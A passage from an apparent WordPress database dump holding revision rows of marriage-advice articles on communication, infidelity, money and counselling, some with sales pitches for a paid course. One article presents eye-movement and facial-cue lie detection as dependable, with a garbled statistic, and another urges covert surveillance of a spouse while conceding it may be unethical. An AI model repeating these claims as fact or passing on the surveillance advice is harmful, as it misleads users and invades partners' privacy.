simmering away for a couple of weeks. I get frustrated at having to search for something when it is not where I expect it to be. Worse still when my partner has shifted it and I don’t know the first place to begin searching.</p>\n<p>Aftershave, needles and thread, car keys, a Tupperware container to store my baking soda in, covers for our outdoor chairs, all were examples of instances where I had to turn the house upside-down. A simple answer from my partner when these things were shifted would have saved me a lot of time and frustration. And the answer I got? “You need to open your eyes and organize yourself better”</p>\n<p>I was gutted. When I come home from work I exercise the dog and cook dinner so that it is on the table by the time my partner gets home. The house is always spotless and warm, as I’m very conscious of coming home to a tidy environment. I see this as a fundamental part of my role in coming home first, and it takes a lot of my time. To imply that I have the time to “organize yourself better” really hurt.</p>\n<p>I don’t expect praise, but I did hope that my efforts were recognized. I got told that “I don’t expect you to cook my dinner every night” was interpreted by me as ingratitude, and hurt me even more.</p>\n<p>So where to from here? My partner felt guilty at coming home every night to the perfect household, whereas I felt guilty if it wasn’t perfect. It was never about me trying to make him feel guilty, but it seems it did. And this is where the communication fell down. He misinterpreted my efforts, and I misinterpreted his response.</p>\n<p>Communication, communication, communication. I need for my partner to keep me informed of where things move to. I need to be informed. I need to voice my frustration before it gets to boiling point. We both need to talk about our feelings more, and how each of our contributions to our home and our relationship make us feel, and how we interpret each others contributions. It is not a competition, but for many couples it feels like it.</p>\n<p>When people feel guilt or stress, it leads them to act funny ways. Often stress and guilt are barriers to communication. The key to overcoming them is to recognize what it is, and have the courage to talk about it. You might be able to do it as a couple, or you might want the help of a friend who can listen to the way you are communicating with each other and offer insights and advice.</p>\n<p>We got it sorted out, and kissed and hugged. It wouldn’t hurt so much if I didn’t feel such love at the same time. But it served as a good reminder to me. Sometimes you get so wrapped up in your own emotions that you forget to think of the other person. You also need to entertain the possibility that you are misinterpreting each other. Talking about it is the way to expose the miscommunication and let the healing begin.</p>\n<p>A good lesson to learn, even for the experts…</p>\n<p>This article is brought to you by Save My Marriage Today.</p>\n<p>You may be   making mistakes that will jeopardize your marriage recovery! My <em><em><a rel=\"nofollow\" href=\"/\">Save My Marriage Today</a> </em></em>course has helped save thousands of marriages and is guaranteed   to deliver results or your money back.</p>\n<p>You can’t   afford to give your marriage 50%. You need 100% – you need the BEST information   now! You<em><em> have </em></em>to learn what   it takes to . Get the whole package that gives you REAL   results … <strong><strong><em>guaranteed.</em></strong></strong></p>\n<p>  </p>\n			  </div>\n			</div>\n		</div>','The effects of a communication breakdown','It happens to the best of us. Communication in a relationship is such a fickle thing, and the lines of communication can become blurred every so often, esp','inherit','closed','closed','','53-revision-v1','','','2017-10-04 09:48:25','2017-10-04 09:48:25','',53,'http://www.bournesociety.org.uk/53-revision-v1',0,'revision','',0),(275,1,'2017-10-04 09:48:41','2017-10-04 09:48:41','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\" id=\"post-140\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Communication In A Relationship				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/communication-listening-from-love/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=communication,Heart,Love,relationship&amp;b=2\" href=\"../communication-listening-from-love/\"></a></div>\n<p>Listening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span></p>\n<p><strong>So, what is “listening from love?”</strong></p>\n<p>“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.</p>\n<blockquote class=\"right\"><p>When you do speak, take the time and have the courage to speak your truth.</p></blockquote>\n<p>Very often people think that if they truly listen with the intention to understand someone that they have agree with them. We think, this is not the case.</p>\n<p>We agree with author Stephen Covey in his book the 7 Habits of Highly Effective People, when he says we should “seek first to understand , then be understood.”</p>\n<p>Listen from love is not judging. It’s listening –truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart.</p>\n<p><strong>One common complaint between partners is “you never listen to me.”</strong></p>\n<p>This was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest.<br /><strong><br />\nSo, in order to “listen from love” more often here’s what we recommend…</strong></p>\n<ul><li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”</li>\n<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\n<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between<br />\nyou.</li>\n<li>Make a conscious effort to avoid reacting defensively, even in your mind, if this is your pattern.</li>\n<li>When you do speak, take the time and have the courage to speak your truth.</li>\n</ul><p> </p>\n<p>Susie and Otto Collins are married, relationship coaches and authors of several books on relationships</p>\n					<p class=\"post_tags\">  </p>\n				</div>\n								</div>\n		</div>','Top 10 tips to communicating in your relationship','','inherit','closed','closed','','54-revision-v1','','','2017-10-04 09:48:41','2017-10-04 09:48:41','',54,'http://www.bournesociety.org.uk/54-revision-v1',0,'revision','',0),(276,1,'2017-10-04 09:48:51','2017-10-04 09:48:51','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-46 post type-post status-publish format-standard hentry category-affairs tag-affair tag-cheating-husband tag-cheating-spouses tag-cheating-wife tag-infidelity tag-married-couples tag-mistrust tag-relationship tag-romance post_box top\" id=\"post-46\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Cheating Spouses Can’t Hide Their Extramarital Affairs From The Truth				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <p>We all lie. A world without little white lies would be uncivilized. But 99% of us have told bigger lies in our lifespan. For most of us, lies told in our personal life makes us feel bad. However, we still continue to lie and cheat.<span id=\"more-46\"></span></p>\n<p>Few events cause as much turmoil in a marriage as infidelity, which can reduce a marriage to rubble, shatter trust and create a breeding ground for insecurity, mistrust and resentment. Most of us have witnessed affairs among people we know, and some of us even have had affairs ourselves. This kind of thing happens in the real world, and it happens all the time. One third of all married couples admit to having cheated on their mates. Let’s not be naïve. That’s quite a large number of people taking risks!<br /><br /></p>\n<p>Affairs begin with two people who find each other interesting and attractive. For whatever reason, the relationship escalates into romance and, finally, into sexual intimacy. People who seek romance and sexual intimacy outside of their primary relationship feel that their relationship is missing something, so they go out and they seek it from someone else.</p>\n<p>If you feel deep in your heart, that your spouse is lying and being unfaithful to you, here are some ways to be sure. One of the techniques professionals use to tell who is lying, and who is telling the truth is to follow eye movements. Neuro-Linguistic Programming says that when people are constructing imaginary or fantasy images we look up and to the left if we are right-handed and up and to the right if we are left-handed. Think, “What color is my Mom’s hair?” Where did your eyes go? Now think, “I’m an astronaut and when I went to the moon I made a snow-man out of moon dust.” Where did your eyes go this time?</p>\n<p>In the book, Telling Lies by lie-catcher Paul Ekman, he presents his ‘facial action coding system.’ These are the facial expressions we all use that are hard-wired to the brain and will show up without our conscious control. Charles Bond, a psychologist at Texas Christian University reported that among 2,520 adults surveyed in 6.3 countries, more than 70% believe that liars tend to avert their gazes and/or stutter, touch, or scratch themselves or tell longer stories than usual.</p>\n<p>If you’re spouse is working too many late nights, think about this next time you ask them what their plans are for the night.</p>\n<p>Although, there has been some research lately that says this analysis is too simplistic to be counted upon, detectives continue to use it along with other tools. There was a story in Outside Magazine about a detective involved in an investigation of a poaching in a national park. He claimed he could tell within one minute if someone was lying. I got very excited and tracked him down to a sub-station in Wyoming. He said that he teaches his skills to trainees in one hour but he wouldn’t tell me what they were. Maybe he thought I was a secret poacher (which is hard to be in Santa Barbara)</p>\n<h3>Here are some other ways to tell if your partner or spouse is lying and having an extramarital affair:</h3>\n<p>1. If their answer to your question is brief, clear, and direct, that is a good sign that it is true.</p>\n<p>2. Liars start to elaborate and repeat themselves and sometimes their story or the details change.</p>\n<p>3. The more a liar tries, the more you need to worry.</p>\n<p>An extramarital affair takes a great deal of energy. The lying, sneaking around, and destroying of evidence all take tremendous amounts of energy. The onset of guilty feelings about having the affair, in the first place, further zaps whatever energy the partner having the affair might still have left. And, guess what all this used energy is a complete waste, because liars cannot control the ‘leakage’ of their true feelings, which run in micro-expressions that last half a second. It is so ordinary, so much a part of our everyday lives and everyday conversations that we hardly notice it.</p>\n<p>Wendy Allen, PhD, president of Wendy Allen PhD Coaching is an expert on marriage and infidelity. She will help you move through the normal but mind-blowing phases of discovery, betrayal, and loss. You can’t go back to how things were, but you can move forward and capture the good moments in life again.</p>\n<p>  </p>\n			  </div>\n			</div>\n		</div>','Cheating Spouses Can’t Hide Their Extramarital Affairs From Us','We all lie. A world without little white lies would be uncivilized. But 99% of us have told bigger lies in our lifespan. For most of us, lies told in our p','inherit','closed','closed','','51-revision-v1','','','2017-10-04 09:48:51','2017-10-04 09:48:51','',51,'http://www.bournesociety.org.uk/51-revision-v1',0,'revision','',0),(277,1,'2017-10-04 09:48:59','2017-10-04 09:48:59','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-2566 post type-post status-publish format-standard hentry category-affairs post_box top\" id=\"post-2566\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Catch A Cheating Spouse Tips</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>A <strong>cheating spouse</strong> will always be a painful discovery and is something that cannot be tackled easily.  The question arises in your mind “How can I find out if my husband or wife is cheating on me or even a boyfriend or a girlfriend, for that matter?”<span id=\"more-2566\"></span></p>\n<h3><em><strong>Do You Have Too Much Trust?</strong></em></h3>\n<p>One main advantage that a cheating spouse has is the trust factor.  When you have built a trusting relationship with your spouse, it is often very difficult to detect infidelity since you trust your spouse and are secure and comfortable and would not even want to think about your spouse lying, let alone cheating on you.</p>\n<h3><em><strong>Signs Of Cheating Spouse Are Always There</strong></em></h3>\n<p>Be warned, however, that signs of infidelity are always there, right under your nose, and it is only a question of how well you keep your eyes, ears open to look out for those warning signals.  Another problem you will face is that once you are suspicious of something, you tend to bring it out in the open which may only help your <em>cheating spouse</em> to adjust his or her behaviour and carry on the cheating in a more effective manner, so as not to be caught.</p>\n<p>So, basically, trust and suspicion that is confronted can work favourably for your spouse, so before asking any questions, collect definite proof of cheating before seeking answers.</p>\n<p>Of course, constant surveillance and careful observation is necessitated for discovering your <span style=\"text-decoration: underline;\">cheating spouse</span>, which may be unethical perhaps, but there is really no alternative here.  There is no other effective method to track down your cheating spouse apart from looking for warning signs and collect some proof of infidelity.</p>\n<h3><em><strong>Some tips about a cheating wife could be:</strong></em></h3>\n<p>•    Finding birth control pills in her medicine cabinet when you have undergone a vasectomy<br />\n•    Your wife has a new email ID without your knowledge<br />\n•    She goes to shop for groceries and returns hours later<br />\n•    Sets up a new cell phone account which is billed to her account<br />\n•    Buys some new clothes<br />\n•    Does not confide or share anything with you any more<br />\n•    Removes the wedding ring</p>\n<h3><em><strong>Some tips about a cheating husband could be:</strong></em></h3>\n<p>•    You find condoms in his pockets when you are already on the pill<br />\n•    You find hairs on his car seat<br />\n•    Children’s items become a nuisance for him in the car<br />\n•    Evidence of a scratch or bruise on his neck or face<br />\n•    He works overtime which is not displayed in the pay stub<br />\n•    Perfume smell in his clothes<br />\n•    Not eating well at mealtimes because he already had his at his mistresses’ home<br />\n•    Signs of lipstick on his dress<br />\n•    Tries out new ways of lovemaking</p>\n<p>Apart from the above, some general warning signals that apply to both a cheating wife or cheating husband would be…</p>\n<p>A sudden reduction in the amount of money deposited in your bank account, uncomfortable friends who would not want to let him or her down, your spouse is touchy and is not comfortable in your presence, intimate clothing found that was not given or bought by you, hanging up of the phone when you pick it up, deleting the incoming calls from the ID, deleting emails too, deliberately picks out a fight with you to get out of the house, whispers on the phone and hangs up suddenly when you arrive in the room etc.</p>\n<h2 style=\"&quot;text-align:\" center=\"\"><em><strong>Reasons  For A Cheating Spouse<br /></strong></em></h2>\n<p><strong>Cheating spouses</strong> have their own reasons for doing so, for instance an unhappy relationship that lacks passion, warmth or love and a lack of appreciation from the other, but it does not necessarily justify their behaviour.  Differences have to be logically reasoned and the partners should take the time out to sit down and discuss the issues confronting them rather than resorting to extra marital affairs, which can only cause a lot of pain and turmoil to the other partner.</p>\n<p>Discussing things in a mature manner, being a patient listener and trying to understand the other’s point of view can all be very helpful in bringing the issue to the fore and taking suitable actions immediately rather than let things go as they are and resort to unethical means like cheating on your spouse.</p>\n<p>Of course, there are many online sites that offer computer software and spy devices and there are also many ebooks and guides that offer help in detecting a <span style=\"text-decoration: underline;\">cheating spouse</span>, but the success of these varies from person to person and depending on your own commonsense judgments is always better.</p>\n<p>So, go ahead and speak out with your spouse and sort out your differences and avoid cheating on your spouse at all costs, as this can ruin your marriage!</p><h3> </h3></div>\n			</div>\n		</div>','Catch A Cheating Spouse Tips','A cheating spouse will always be a painful discovery.  The question arises in your mind “How can I find out if my husband or wife is cheating on me?”','inherit','closed','closed','','50-revision-v1','','','2017-10-04 09:48:59','2017-10-04 09:48:59','',50,'http://www.bournesociety.org.uk/50-revision-v1',0,'revision','',0),(278,1,'2017-10-04 10:10:09','2017-10-04 10:10:09','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-1858 post type-post status-publish format-standard hentry category-marriage tag-financial-help tag-financial-liability tag-happiness tag-love-and-money tag-marriage tag-true-love post_box top\" id=\"post-1858\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Are You Viewing Marriage As A Financial Liability?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/are-you-viewing-marriage-as-a-financial-liability/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=Financial+Help,Financial+Liability,Happiness,Love+And+Money,Marriage,True+Love&amp;b=2\" href=\"../are-you-viewing-marriage-as-a-financial-liability/\"></a></div>\n<p>Yes, it has become acceptable in this modern society to look at marriage as an investment. Marriage is now viewed as either an asset or a liability. People who are more conscious of their financial well-being are asking all the possible risks before they marry.</p>\n<p>And to others, love still prevails; they put all financial questions aside as they dive into marriage with full hope and trust that everything will work out fine. How about you? What is your view on marriage? Does it really matter if it’s a financial help or trap?<span id=\"more-1858\"></span></p>\n<p>In the olden days, marriage is as easy as asking whether or not you love the person enough to be linked to him or her, until death do you part. With today’s living complexities, however, it has evolved to another level of union – that is, for love and money. There are so many things to tackle when discussing marriage and finances. It involves different areas in people’s lives, such as their values, beliefs, goals, and other things, like sensitive subjects that weren’t normally discussed before.</p>\n<p>So how is it really? Are you viewing your marriage as a <strong>financial liability</strong>? Ask yourself these questions.</p>\n<p><strong>Is it true love?</strong></p>\n<p>You may think that it’s silly to ask, but, it isn’t. Sometimes security and comfort is being confused by people with love. When your spouse can provide the material things to make your life comfortable, you associate this with generosity, kindness, and happiness. Sometimes it is all that, but other times, it isn’t.</p>\n<p>Love goes beyond the material gains, meaning even if your spouse is poor, you will bear with him or her and see it through together. If you cannot be with your spouse because he or she has failed to provide, or has become a financial burden, then it is your mind that is working, not your heart.</p>\n<p>Which do you think is more important, money or love?</p>\n<p>Ok, it sounds like another silly question, but think about it. Money and love go hand in hand in almost all aspects of daily living. They are both important in every person’s life, maybe at different levels, but equally important. Whether we like it or not, Money makes the world go round, just as much as love does.</p>\n<p>You cannot continue loving without money to feed you, keep you living like you do. A long time ago, it may have been easy to live without money, but in today’s age, this is nearly impossible. If you were given a choice, which would you choose? Which would you prioritize?<br /><strong><br />\nWhat do you think your life would be like after marriage?</strong></p>\n<p>Or if you’re married, is your marriage anything like you’ve imagined before? Marriage means that you’ve allowed almost everything in your life to be shared with one person. This include problems, decisions, joy, sorrow, and any amount of freedom you enjoy.</p>\n<p>But people, by nature or by upbringing, are fairly different in some thins, and this include spending habits. If both parties do not agree, an argument usually ensues. As a result, it can cause immense strain.</p>\n<p>If you are a single person, you may either feel terrified to get married, or excited to be. One thing’s for sure though, that you’ve thought of how your financial life would be like, when or if, you are married. You may be hesitant because you know that many marriages ended up in divorce when their financial responsibilities were already too much to bear.And you may be excited about it because being married may be connected with lower cost of living, and financial strength.</p>\n<p>Have you weighed the advantages and disadvantages of being married?</p>\n<p>Sometimes the thought of marriage can overwhelm a person when they know the financial liabilities that would come with it.</p>\n<p><strong>What are the disadvantages?</strong></p>\n<p>First will be the cost of the wedding. Some couple brings debt into their marriage because of holding an extravagant wedding that they can’t actually afford. After a few years, they will have to worry about the cost of raising children. The expenses for an infant are so expensive that some couples opt to have only one child.</p>\n<p>If they think raising kids are expensive, wait until they grow up and go to college. And then, Married couples usually have higher taxes because your incomes are seen as once income, and a higher income tax bracket is set upon you.</p>\n<p><strong>What are the advantages?</strong></p>\n<p>There is strength in numbers; two heads working for a single goal are better than one. Being married entitles you to having a supporter no matter what financial situation you are in- this is if your spouse is truly concerned about your well-being.</p>\n<p>Spouses also don’t pay estate tax, and gifts between spouses aren’t subject to gift tax. You’ll have the ability to share deductions for kids, mortgage payments, and other aspects of a married life, such as sharing a home and utilities.</p>\n<p>  </p>\n				</div>\n								</div>\n		</div>','Marriage - is it A Financial Liability?','','inherit','closed','closed','','46-revision-v1','','','2017-10-04 10:10:09','2017-10-04 10:10:09','',46,'http://www.bournesociety.org.uk/46-revision-v1',0,'revision','',0),(279,1,'2017-10-04 10:10:33','2017-10-04 10:10:33','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1030 post type-post status-publish format-standard hentry category-marriage tag-closeness tag-conflict tag-counselor tag-marriage tag-relationship tag-romance tag-sexless-marriage post_box top\" id=\"post-1030\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Are you drifting apart from your spouse?</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>Get the feeling you are drifting apart from your spouse? You can rescue the relationship with a little renewed love and attention toward one another, like when you first married. Can you remember how great your marriage was back then?  If you can’t then get out your wedding photos to remind yourself of how happy you once were. You can be like that again.</p>\n<p>Sadly, in most marriages, the initial excitement of newlyweds starts to wear off over the years due to the stresses of everyday life. </p>\n<p>Eventually you start to drift apart…<span id=\"more-1030\"></span></p>\n<p><strong>Two reasons why you grow apart.</strong></p>\n<p>If you are the husband then you may work so hard and for so many hours that you are hardly at home to pay attention to your wife, which can make her feel you aren’t there for her any more. </p>\n<p>You may be satisfying her financial needs but you aren’t satisfying your wife’s emotional needs. The danger is she might start to look elsewhere to satisfy them.</p>\n<p>Or maybe you are constantly there for your wife but she is so busy running the household and looking after the kids that she doesn’t pay attention to your emotional needs any more. Men have emotional needs too, don’t they? Of course they do.</p>\n<p>What it all boils down to is that each of you is so busy with the everyday stuff of married life that you are slowly but surely drifting apart. You have become emotionally distant to each other and are no longer communicating.A lack of communication is one of the issues in marriage that you need to deal with. If you can’t talk to you spouse how can you tell them how you truly feel?</p>\n<p>If it goes on for any length of time you will become strangers in your own home and the marriage is in danger of breaking down from a lack of closeness. It can get so bad you may even end up in a <a href=\"../category/all-articles/marriage/sexless-marriages/\">sexless marriage</a>. If not due to health problems, then a lack of sex in a marriage is a sure sign of deep relationship issues between husband and wife.</p>\n<p><strong>Talk over problems in your marriage</strong></p>\n<p>Even the best marriages never run smoothly all the time and you have to be ready to knuckle down when problems arise. When they do remember to think carefully before you speak, and never get angry or you will make things worse.</p>\n<p>A small problem in your marriage can develop into a major source of conflict if you leave it festering for too long so talk about it with your spouse before it gets out of hand.</p>\n<p>If you feel emotionally distant and find it hard to talk about marriage problems with your spouse then you might need to see a marriage counselor to help you . While talking over marital difficulties is a great help, both of you need to do something to solve them.</p>\n<p><strong>Marriage is an ongoing commitment.</strong></p>\n<p>Many people stay in a marriage just because of the children. But that is not a good enough reason even though there are many side effects of divorce on children. Saving a marriage starts with a commitment by both parties that the marriage is worth saving. </p>\n<p>A truly strong marriage is based on a never-ending commitment to each other, which means you have to work constantly on your marriage to stop it breaking down. If, for example, you don’t spend enough time together any more, plan a night out every week without the kids.</p>\n<p>And when you are together try some imaginative, romantic ways to spend that precious time. Don’t do the same old thing every week. Mix it up a bit to keep it exciting. There’s nothing quite like a bit of romance to lift a stale marriage out of the doldrums.</p>\n<p>If you really want to bring back the love in your marriage it won’t happen without a bit of effort from at least one, and preferably both of you. You can renew the love if you try hard enough.</p>\n<p>If only one of you is committed to making your marriage work, it’s a lot more difficult but even so there are ways to overcome your spouse’s lack of commitment if you have the right advice</p>\n<p>If you want really practical marriage advice we highly recommend Save My Marriage Today. A guide that has helped thousands of married couples restore their relationship and save their marriage. </p>\n<p> </p></div>\n			</div>\n		</div>','How to know if you are drifting away from your spouse','Get the feeling you are drifting apart from your spouse? You can rescue the relationship with a little renewed love and attention toward one another, like','inherit','closed','closed','','44-revision-v1','','','2017-10-04 10:10:33','2017-10-04 10:10:33','',44,'http://www.bournesociety.org.uk/44-revision-v1',0,'revision','',0),(280,1,'2017-10-04 10:10:59','2017-10-04 10:10:59','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1257 post type-post status-publish format-standard hentry category-marriage tag-communication tag-counselor tag-help tag-make tag-marital-problems tag-marriage-counselling tag-marriage-help tag-marriage-issues tag-marriage-problems post_box top\" id=\"post-1257\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Are You Considering Marriage Counselling For Your Marriage Problems?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>Couples who are having marriage problems may be considering seeing a marriage counselor but are worried about what to expect.  After all, it’s not easy to talk to a complete stranger about your hurt feelings and all the things that have made both partners unhappy.</p>\n<p>It’s even more difficult to change the behaviours that caused the unhappiness.  However, by the time most couples decide to seek marriage counselling, the problems in their marriage have usually left them in too much distress to deal with it them themselves.<span id=\"more-1257\"></span> </p>\n<p>Some couples are worried that the issues that they must discuss with a marriage counsellor might be too painful, but a good marriage counsellor can help steer a couple toward the type of solutions that can resolve issues in a positive and constructive manner.</p>\n<p>Marriage counselling works by addressing the underlying marital problems, and separating the hurt and anger from the actual issues. The couple is encouraged to express their feelings both together and individually in a constructive way. Usually, when a couple fights, they have a tendency to lash out in ways that are intended to hurt or control each other, which only leads to more problems. </p>\n<p>It is very hard to deal with marriage issues when the causes of the underlying problems are not even recognized.  A good marriage counselor will help to bring the underlying issues out in the open and help couples understand what caused the problems in the first place.  The benefits of marriage counseling cannot be overstated, as it can put marital problems in perspective, and make them seem less overwhelming.  </p>\n<p>When couples are in marriage counseling, they are encouraged, with the guidance of the counsellor, to discuss their true feelings without fear of retribution or humiliation. Talking about your feelings can go a long way in helping a couple begin the task of repairing the damage in their marriage that has been building up over time.</p>\n<p>It’s not easy to discuss your innermost feelings to a complete stranger but it may be the only course of action left if you want to .  </p>\n<p>Marriage counsellors are not the miracle workers some people think they are. What they do is facilitate communication between the wife and the husband so that marital issues can be resolved if that is what the couple really wants.</p>\n<p>Marriage counselling does not work in many difficult cases but may be worth a try if it helps to .</p>					<p class=\"post_tags\"> </p></div>\n			</div>\n		</div>','Have you ever considered marriage counselling for your problems?','Couples who are having marriage problems may be considering seeing a marriage counselor but are worried about what to expect.  After all, it’s not easy to talk to a complete stranger about your hurt feelings and all the things that have made both partners unhappy.','inherit','closed','closed','','43-revision-v1','','','2017-10-04 10:10:59','2017-10-04 10:10:59','',43,'http://www.bournesociety.org.uk/43-revision-v1',0,'revision','',0),(281,1,'2017-10-04 10:11:18','2017-10-04 10:11:18','<div id=\"content\" class=\"hfeed\">	\n		\n		\n	<div class=\"post-233 post type-post status-publish format-standard hentry category-marriage tag-control-freak tag-marriage tag-marriage-problems tag-money-problems\">\n	\n				<h1 class=\"entry-title\">Are Money Problems Pulling Your Marriage Apart?</h1>\n\n		<div class=\"byline-meta\"/>		\n				<div class=\"entry-content\">\n		<p><em><strong>Money problems</strong></em> are one of the main reasons a marriage can get into trouble. It is hard to keep a marriage happy when all you seem to think about is how to pay the bills and keep a roof over your head.<span id=\"more-233\"/></p>\n<p>However, you can be happy without being wealthy as long as you manage the financial side of your marriage sensibly and don’t get into debt for things you don’t really need. Arguments over <span style=\"text-decoration:underline;\">money problems</span> between husband and wife are often caused not by a lack of money but how one of the marriage partners spends it.</p>\n<p>The sad fact is that money to some people is there to be spent no matter what the circumstances. They have no thought of tomorrow and need constant gratification in the form of spending. They are wasteful with money and buy things that are not really needed. In fact, spending money is like an addiction to some people as gambling is to others.</p>\n<h2><em>Marriage and debt problems.</em></h2>\n<p>When money is short, the reckless partner often <a href=\"http://www.moneysavingexpert.com/banking/interest-rates\" target=\"_blank\" rel=\"nofollow\">borrows money at high rates</a> for non-essentials because they want something and simply do not think or even care about how much it will cost them. They rack up massive credit card debts. They want something, they want it now, and nobody is going to stop them.The reckless spender is like a gambler who goes on tilt when he is losing, out of control and emotionally driven.</p>\n<p>A financially inept partner will also get high-interest loans that they really can’t afford because they haven’t planned for the inevitable money emergencies that crop up now and then. Paying high interest on loans will only increase the debt and it can rapidly become a mountain that will never be reduced.</p>\n<p>Bad financial management like this in a marriage has a habit of developing into a major cause of trouble between husband and wife. The fact is, some people just don’t know how to manage money properly and this eventually causes all sorts of problems for the marriage. Mounting debt problems cause lots of stress and marital discord.</p>\n<p>When one partner is haphazard with finances and the other one is more sensible then the difference in the way they handle money comes to the fore and causes trouble for the marriage.</p>\n<p>The partner who is more careful with money sees their spouse wasting money and running up debts all over the place. However, when he or she tries to talk about the money problems they get called a miser just for trying to bring their finances back under control. Not being able to talk frankly about <a href=\"http://marriage.about.com/od/finances/a/financialuncert.htm\" target=\"_blank\" rel=\"nofollow\">financial problems</a> with your spouse can cause simmering tensions that will eventually explode into an argument.</p>\n<h2><strong><br/></strong><em>Money as a source of control in a marriage.</em></h2>\n<p>They say having control of the money is like having power and one of the partners often takes charge of the finances as a source of control in the marriage. In fact, this is a favourite tactic of a control freak. Holding the purse strings in a marriage is one of the many ways they exert control over their partner. They dictate how the money is to be spent and won’t allow any say in the matter.<br/>\n.<br/>\nThe problem with this is that when one partner handles all the finances without letting their spouse have a say about it then conflict is almost inevitable. Where money is concerned, both partners should contribute when it is affecting their marriage negatively.</p>\n<h3><em><strong>Conclusion:</strong></em></h3>\n<p>There is no doubt that <a href=\"http://www.supportline.org.uk/problems/debt.php\" target=\"_blank\" rel=\"nofollow\">money problems</a> can make for a troubled marriage and when this is a result of the behaviour of one of the partners this has to be changed before it brings the marriage to its knees, both financially and emotionally. It may not be easy to do this, but it has to be done because, like an <a href=\"http://forums.moneysavingexpert.com/showthread.php?t=1095701\" target=\"_blank\" rel=\"nofollow\">unpaid debt</a>, the problem will only get bigger as time goes by.</p>\n<p>—–			  </p>\n			  </div>\n	</div>\n			      </div>','It\'s no secret that money problems can pull your marriage apart','Money problems are one of the main reasons a marriage can get into trouble. It is hard to keep a happy marriage when all you seem to think about is how to pay the bills and keep a roof over your head.','inherit','closed','closed','','42-revision-v1','','','2017-10-04 10:11:18','2017-10-04 10:11:18','',42,'http://www.bournesociety.org.uk/42-revision-v1',0,'revision','',0),(282,1,'2017-10-04 10:12:45','2017-10-04 10:12:45','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-45 post type-post status-publish format-standard hentry category-affairs tag-affair tag-chat-rooms tag-cheating tag-cheating-husband tag-cheating-wife tag-elaine-lemons tag-emotional-affair tag-help tag-how-to-survive-an-affair tag-make tag-online-infidelity tag-preferred-customers tag-relationship tag-voice-memos post_box top\" id=\"post-45\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Are mobile phones To Blame for Marital Misconduct?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <p>Remember that day so long ago when you said, “I do”. There was no doubt in your mind at that very moment that you were in for the long haul and never thought about anything else.</p>\n<p>You acknowledged your vows with the truest of intentions and with your whole heart. I’m sure you I soon discovered married life is tough and that can contribute to problems in the best of marriages. Two people can love each other so much and still lose their way.</p>\n<p>My marriage wasn’t perfect but there was nothing going on to make me think it was falling apart, at least I didn’t think so at the time. My husband and I had been through a lot like every other couple and I felt comfortable in our relationship.</p>\n<p>We argued, made-up and went on with life. One night we were in Walmart and as usual we parted ways to do our shopping. He had his cell phone and I had mine so that we 